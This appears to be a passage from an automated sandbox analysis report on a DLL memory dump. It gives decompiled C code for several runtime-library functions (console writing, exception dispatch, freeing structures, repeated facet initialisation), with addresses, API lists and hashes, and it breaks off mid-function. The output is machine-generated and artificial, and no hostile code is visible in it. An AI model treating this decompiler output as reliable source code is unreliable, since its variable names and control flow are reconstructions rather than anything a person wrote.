Opcode Fuzzy Hash: 2bb5e24f0174f6d2d02a406a75459807db36a0c8eb041ae42f10313f97b2e78b
Instruction Fuzzy Hash: A1F0F4BA545A0E2BC74216F4AD49F8B236F8BC367AB280915F52CD61D4EF6084028874

Uniqueness

Uniqueness Score: -1.00%

Function 6E212C2B, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E212C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x6e28506c; // 0x3ec3ee36
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6e2876f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6e2876f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6E20367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6e2876f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6e2876f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6e2876f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6E20CF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6E20CF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6E1DF8A5(_v8 ^ _t133, _t129, _t132);
			}

0x6e212c33
0x6e212c3a
0x6e212c3d
0x6e212c45
0x6e212c49
0x6e212c55
0x6e212c58
0x6e212c5b
0x6e212c62
0x6e212c6a
0x6e212c6d
0x6e212c73
0x6e212c79
0x6e212c7e
0x6e212c80
0x6e212c83
0x6e212c88
0x6e212c92
0x6e212c99
0x6e212c9c
0x6e212ca3
0x6e212caa
0x6e212cc5
0x6e212ccd
0x6e212cd6
0x6e212cfc
0x6e212cfe
0x00000000
0x6e212cd8
0x6e212cdb
0x6e212da2
0x6e212dae
0x6e212db9
0x6e212dbe
0x6e212ce1
0x6e212ce8
0x6e212ced
0x6e212cf3
0x6e212cf9
0x00000000
0x6e212cf9
0x6e212cf3
0x6e212cdb
0x6e212cac
0x6e212cb0
0x6e212cb3
0x6e212cb9
0x6e212cbb
0x6e212cbe
0x6e212cc2
0x6e212cff
0x6e212d02
0x6e212d03
0x6e212d08
0x6e212d0e
0x6e212d14
0x6e212d23
0x6e212d29
0x6e212d2f
0x6e212d34
0x6e212d50
0x6e212dc3
0x6e212dc9
0x6e212d52
0x6e212d5a
0x6e212d63
0x6e212d69
0x00000000
0x6e212d6b
0x6e212d6d
0x6e212d70
0x6e212d89
0x00000000
0x6e212d8b
0x6e212d8f
0x6e212d91
0x6e212d94
0x00000000
0x6e212d94
0x6e212d8f
0x6e212d89
0x6e212d69
0x6e212d63
0x6e212d50
0x6e212d34
0x6e212d0e
0x00000000
0x6e212d97
0x6e212d97
0x6e212dcb
0x6e212ddd

APIs

GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6E2133A0,?,?,00000000,?,?,?), ref: 6E212C6D
__fassign.LIBCMT ref: 6E212CE8
__fassign.LIBCMT ref: 6E212D03
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6E212D29
WriteFile.KERNEL32(?,00000000,00000000,6E2133A0,00000000,?,?,?,?,?,?,?,?,?,6E2133A0,?), ref: 6E212D48
WriteFile.KERNEL32(?,?,00000001,6E2133A0,00000000,?,?,?,?,?,?,?,?,?,6E2133A0,?), ref: 6E212D81

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 74ff004bb44e5b1714468114b42a2bda59143af8606f92a116811cdd415c799b
Instruction ID: 1a06ea1de8df4813e6822bc28187c410ee213ba68e5235ad8882336130b4ef33
Opcode Fuzzy Hash: 74ff004bb44e5b1714468114b42a2bda59143af8606f92a116811cdd415c799b
Instruction Fuzzy Hash: 1451A6B190460E9FDB00CFA8C885ADEBBF9EF0A310F14455AF955E7281D730DA51DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E6E1E3F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6e28506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6E1E3F20(_t74, __edx);
				E6E1E5267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6E1E5920(_t74, 0xfffffffe, _t93, 0x6e28506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6E1E58D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6E1E3F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6e22e698;
											if(__eflags != 0) {
												_t70 = E6E227400(__eflags, 0x6e22e698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6e22e698; // 0x6e1e3b1a
													 *0x6e22a26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6E1E5904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6E1E5920(_t63, _t90, _t93, 0x6e28506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6E1E3F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6E1E58E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6E202281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = RtlAllocateHeap( *0x6e287b04, 0, _t95); // executed
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6E21BEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6E209256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}

0x6e1e3f60
0x6e1e3f66
0x6e1e3f67
0x6e1e3f6b
0x6e1e3f6c
0x6e1e3f73
0x6e1e3f76
0x6e1e3f7c
0x6e1e3f7d
0x6e1e3f7e
0x6e1e3f85
0x6e1e3f88
0x6e1e3f8b
0x6e1e3f93
0x6e1e3f98
0x6e1e3f9b
0x6e1e3f9e
0x6e1e3fa5
0x6e1e4006
0x6e1e4009
0x6e1e4011
0x6e1e4018
0x00000000
0x6e1e4018
0x00000000
0x6e1e3fa7
0x6e1e3fa7
0x6e1e3fad
0x6e1e3fb3
0x6e1e3fb9
0x6e1e4029
0x6e1e4032
0x6e1e3fbb
0x6e1e3fc0
0x6e1e3fc0
0x6e1e3fc3
0x6e1e3fc6
0x6e1e3fc9
0x6e1e3fcc
0x6e1e3fcf
0x6e1e3fd2
0x6e1e3fd7
0x6e1e3fed
0x00000000
0x6e1e3fd9
0x6e1e3fd9
0x6e1e3fdb
0x6e1e3fe0
0x6e1e3fe2
0x6e1e3fe5
0x6e1e3fe7
0x6e1e3ffd
0x6e1e401d
0x6e1e401d
0x6e1e401e
0x6e1e4021
0x00000000
0x6e1e3fe9
0x6e1e3fe9
0x6e1e4033
0x6e1e4036
0x6e1e403c
0x6e1e403e
0x6e1e4045
0x6e1e404c
0x6e1e4051
0x6e1e4054
0x6e1e4056
0x6e1e4058
0x6e1e4065
0x6e1e406b
0x6e1e406d
0x6e1e4070
0x6e1e4070
0x6e1e4073
0x6e1e4073
0x6e1e4045
0x6e1e4079
0x6e1e407b
0x6e1e4080
0x6e1e4083
0x6e1e4086
0x6e1e408e
0x6e1e4092
0x6e1e4097
0x6e1e4097
0x6e1e409a
0x6e1e409b
0x6e1e409e
0x6e1e40a1
0x6e1e40ac
0x6e1e40ae
0x6e1e40b1
0x6e1e40b6
0x6e1e40ba
0x6e2023d7
0x6e20f26f
0x6e20f272
0x6e20f273
0x6e20f276
0x6e20f279
0x6e20f2ab
0x6e20f2b0
0x6e20f2b6
0x6e20f2b6
0x6e20f27b
0x6e20f27b
0x6e20f27d
0x6e20f27f
0x6e20f27f
0x6e20f296
0x6e20f29f
0x6e20f2a5
0x6e20f2a7
0x00000000
0x00000000
0x6e20f287
0x6e20f289
0x00000000
0x6e20f28b
0x6e20f28c
0x6e20f291
0x6e20f292
0x6e20f294
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20f294
0x00000000
0x6e20f289
0x6e20f2a9
0x6e20f2b8
0x6e20f2ba
0x6e1e3feb
0x00000000
0x6e1e3feb
0x6e1e3fe9
0x6e1e3fe7
0x00000000
0x6e1e3ff0
0x6e1e3ff0
0x6e1e3ff2
0x6e1e3ff9
0x00000000
0x6e1e3ffb
0x00000000
0x6e1e3ff9
0x6e1e3fb9
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6E1E3F8B
___except_validate_context_record.LIBVCRUNTIME ref: 6E1E3F93
_ValidateLocalCookies.LIBCMT ref: 6E1E4021
__IsNonwritableInCurrentImage.LIBCMT ref: 6E1E404C
_ValidateLocalCookies.LIBCMT ref: 6E1E40A1

Strings

csm, xrefs: 6E1E4036

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c6d3dff157a71dbcc2c54bb81fcbd19c58129389197c44339c49d14aa92eba58
Instruction ID: f43d5cafab773b556b1020f533bae03a97185ebd41a838ff66daa9ac4055631e
Opcode Fuzzy Hash: c6d3dff157a71dbcc2c54bb81fcbd19c58129389197c44339c49d14aa92eba58
Instruction Fuzzy Hash: B341E134A00A09AFCF04DFA8C844AEE7BF9AF45328F108565F8155B792D731AD82DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E21D29B, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E21D29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6E21CF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6E21CF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6E21CF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6E21CF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6E21CF81(_t5, 2);
					E6E20CBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6E21CF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6E21CF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6E21CF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6E21CF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6E21CF81(_t13, 2);
					E6E20CBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E20CBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6e21d2a1
0x6e21d2a6
0x6e21d2af
0x6e21d2b4
0x6e21d2ba
0x6e21d2bf
0x6e21d2c5
0x6e21d2ca
0x6e21d2d0
0x6e21d2d5
0x6e21d2de
0x6e21d2e9
0x6e21d2f4
0x6e21d2ff
0x6e21d304
0x6e21d30d
0x6e21d312
0x6e21d31b
0x6e21d323
0x6e21d32c
0x6e21d331
0x6e21d33a
0x6e21d33f
0x6e21d348
0x6e21d353
0x6e21d35e
0x6e21d369
0x00000000
0x6e21d379
0x6e21d37e

APIs

Part of subcall function 6E21CF81: _free.LIBCMT ref: 6E21CFAA

_free.LIBCMT ref: 6E21D2E9

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E21D2F4
_free.LIBCMT ref: 6E21D2FF
_free.LIBCMT ref: 6E21D353
_free.LIBCMT ref: 6E21D35E
_free.LIBCMT ref: 6E21D369
_free.LIBCMT ref: 6E21D374

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction ID: de23213db884c6b6085ab85b17c8d5dced45a5f536ba1953d34a3735d1927f53
Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction Fuzzy Hash: 1C115479948B4CABD620A7F0CC47FCBB7EE9F04B04F504D36A39A6E0A1D775B6044651

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF60D, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF60D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;

				_t469 = __edx;
				_t358 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t506 - 0x14, 0);
				_t483 =  *0x6e286df4; // 0x0
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6E1A161C(0x6e286da0);
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6E1C66BA(_t506 - 0x14);
					return E6E1E0075(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6E1D11AB(__ebx, _t361, __edx, _t471, _t483) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t506 - 0x20);
							E6E1E3D74(_t506 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t471, _t483, 0x14);
							E6E1C6653(_t506 - 0x14, 0);
							_t484 =  *0x6e286dc8; // 0x0
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6E1A161C(0x6e286d7c);
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6E1C66BA(_t506 - 0x14);
								return E6E1E0075(_t472);
							} else {
								__eflags = _t484;
								if(_t484 == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6E1D1230(_t358, _t368, __edx, _t472, _t484) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t506 - 0x20);
										E6E1E3D74(_t506 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t358, _t472, _t484, 0x14);
										E6E1C6653(_t506 - 0x14, 0);
										_t485 =  *0x6e286dc4; // 0x0
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6E1A161C(0x6e286d78);
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6E1C66BA(_t506 - 0x14);
											return E6E1E0075(_t473);
										} else {
											__eflags = _t485;
											if(_t485 == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6E1D12B4(_t358, _t375, __edx, _t473, _t485) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t506 - 0x20);
													E6E1E3D74(_t506 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t358, _t473, _t485, 0x14);
													E6E1C6653(_t506 - 0x14, 0);
													_t486 =  *0x6e286dd8; // 0x0
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6E1A161C(0x6e286d84);
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t206);
													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6E1C66BA(_t506 - 0x14);
														return E6E1E0075(_t474);
													} else {
														__eflags = _t486;
														if(_t486 == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6E1D1339(_t358, _t382, _t469, _t474, _t486) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t506 - 0x20);
																E6E1E3D74(_t506 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t358, _t474, _t486, 0x14);
																E6E1C6653(_t506 - 0x14, 0);
																_t487 =  *0x6e286db0; // 0x0
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6E1A161C(0x6e286d64);
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6E1C66BA(_t506 - 0x14);
																	return E6E1E0075(_t475);
																} else {
																	__eflags = _t487;
																	if(_t487 == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6E1D13A1(_t358, _t389, _t469, _t475, _t487) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t506 - 0x20);
																			E6E1E3D74(_t506 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t358, _t475, _t487, 0x14);
																			E6E1C6653(_t506 - 0x14, 0);
																			_t488 =  *0x6e286ddc; // 0x0
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6E1A161C(0x6e286d88);
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6E1C66BA(_t506 - 0x14);
																				return E6E1E0075(_t476);
																			} else {
																				__eflags = _t488;
																				if(_t488 == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6E1D1409(_t358, _t396, _t469, _t476, _t488) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t506 - 0x20);
																						E6E1E3D74(_t506 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t358, _t476, _t488, 0x14);
																						E6E1C6653(_t506 - 0x14, 0);
																						_t489 =  *0x6e286de0; // 0x0
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6E1A161C(0x6e286d8c);
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6E1C66BA(_t506 - 0x14);
																							return E6E1E0075(_t477);
																						} else {
																							__eflags = _t489;
																							if(_t489 == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6E1D1471(_t358, _t403, _t469, _t477, _t489) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t506 - 0x20);
																									E6E1E3D74(_t506 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t358, _t477, _t489, 0x14);
																									E6E1C6653(_t506 - 0x14, 0);
																									_t490 =  *0x6e286dfc; // 0x0
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6E1A161C(0x6e286da8);
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6E1C66BA(_t506 - 0x14);
																										return E6E1E0075(_t478);
																									} else {
																										__eflags = _t490;
																										if(_t490 == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6E1D14EC(_t358, _t410, _t469, _t478, _t490) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t506 - 0x20);
																												E6E1E3D74(_t506 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t358, _t478, _t490, 0x14);
																												E6E1C6653(_t506 - 0x14, 0);
																												_t491 =  *0x6e286dcc; // 0x0
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6E1A161C(0x6e286d80);
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6E1C66BA(_t506 - 0x14);
																													return E6E1E0075(_t479);
																												} else {
																													__eflags = _t491;
																													if(_t491 == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6E1D1558(_t358, _t417, _t469, _t479, _t491) - 0xffffffff;
																														if(__eflags == 0) {
